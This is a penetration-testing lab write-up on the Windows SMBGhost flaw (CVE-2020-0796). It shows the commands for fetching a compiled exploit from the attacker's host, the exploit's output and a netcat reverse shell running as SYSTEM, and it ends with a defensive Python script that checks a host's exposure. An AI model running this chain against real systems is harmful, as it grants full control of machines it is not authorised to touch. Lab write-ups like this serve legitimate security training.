CVE-2020-0796


wesng has identified that the target system is vulnerable to CVE-2020-0796

A vulnerability has been found in Microsoft Windows 10 1903, Windows 10 1909, Windows Server 1903 and Windows Server 1909 and classified as very critical. Affected by this vulnerability is an unknown functionality of the SMBv3 component. Manipulated Server Message Block traffic leads to an input validation flaw. This vulnerability is known as CVE-2020-0796. The attack can be launched remotely. Furthermore, there is an exploit available. A worm is spreading which automatically exploits this vulnerability.

Exploit (SMBGhost)


Exploit found online

Compilation


The default shellcode launches cmd.exe; this has to be changed.

The shellcode array has been updated with the payload.

Compiling complete

Exploitation


PS C:\tmp> iwr -uri http://192.168.45.245/CVE-2020-0796/x64/Release/cve-2020-0796-local.exe -Outfile C:\tmp\cve-2020-0796-local.exe

Delivery complete over HTTP.

PS C:\tmp> .\cve-2020-0796-local.exe
 
-= CVE-2020-0796 LPE =-
by @danigargu and @dialluvioso_
 
Successfully connected socket descriptor: 216
Sending SMB negotiation request...
Finished SMB negotiation
Found kernel token at 0xffffa683aca17060
Sending compressed buffer...
SEP_TOKEN_PRIVILEGES changed
Injecting shellcode in winlogon...
Success! ;)

Executing the exploit

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/billyboss]
└─$ nnc 1234                                      
listening on [any] 1234 ...
connect to [192.168.45.245] from (UNKNOWN) [192.168.148.61] 49713
Microsoft Windows [Version 10.0.18362.719]
(c) 2019 Microsoft Corporation. All rights reserved.
 
C:\Windows\system32> whoami
 whoami
nt authority\system
 
C:\Windows\system32> hostname
 hostname
billyboss
 
C:\Windows\system32> ipconfig
 ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Ethernet0:
 
   Connection-specific DNS Suffix  . : 
   IPv4 Address. . . . . . . . . . . : 192.168.148.61
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.148.254

System-level compromise.
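Added triage helper (written for this page, not code from the write-up or from the exploit authors): given the build banner printed in the shell above and the LanmanServer DisableCompression registry value from Microsoft's ADV200005 workaround, it classifies a host's SMBGhost exposure. The affected builds (18362 for 1903, 18363 for 1909) and the fixed revision (720, from the March 2020 update KB4551762) are my assumptions from Microsoft's advisory, not values taken from the page.

```python
import re

# Builds affected by CVE-2020-0796 and the revision at which the fix landed
# (assumed: KB4551762 raised both 1903 and 1909 to OS build revision 720).
AFFECTED_BUILDS = {18362: "1903", 18363: "1909"}
FIXED_REVISION = 720

_VERSION_RE = re.compile(r"\b(\d+)\.(\d+)\.(\d+)\.(\d+)\b")


def parse_build(version_line):
    """Return (major, minor, build, revision) from a 'ver'-style banner such as
    'Microsoft Windows [Version 10.0.18362.719]', or None if no four-part
    version number is present."""
    m = _VERSION_RE.search(version_line)
    if not m:
        return None
    return tuple(int(x) for x in m.groups())


def assess_smbghost(version_line, disable_compression=None):
    """Classify a host's exposure to SMBGhost.

    disable_compression is the DWORD found at
    HKLM\\SYSTEM\\CurrentControlSet\\Services\\LanmanServer\\Parameters
    \\DisableCompression; pass None when the value is absent (Windows then
    treats SMBv3 compression as enabled).

    Returns one of "unknown", "not_affected", "patched", "mitigated",
    "vulnerable".
    """
    parsed = parse_build(version_line)
    if parsed is None:
        return "unknown"
    major, minor, build, revision = parsed
    if (major, minor) != (10, 0) or build not in AFFECTED_BUILDS:
        return "not_affected"
    if revision >= FIXED_REVISION:
        return "patched"
    # Unpatched affected build: the registry workaround removes the compressed
    # packet path the exploit relies on, but it is not a substitute for the fix.
    if disable_compression == 1:
        return "mitigated"
    return "vulnerable"
```

The build captured in the shell above, 10.0.18362.719, is one revision below the fix and is classified as "vulnerable", which agrees with what wesng reported for this host.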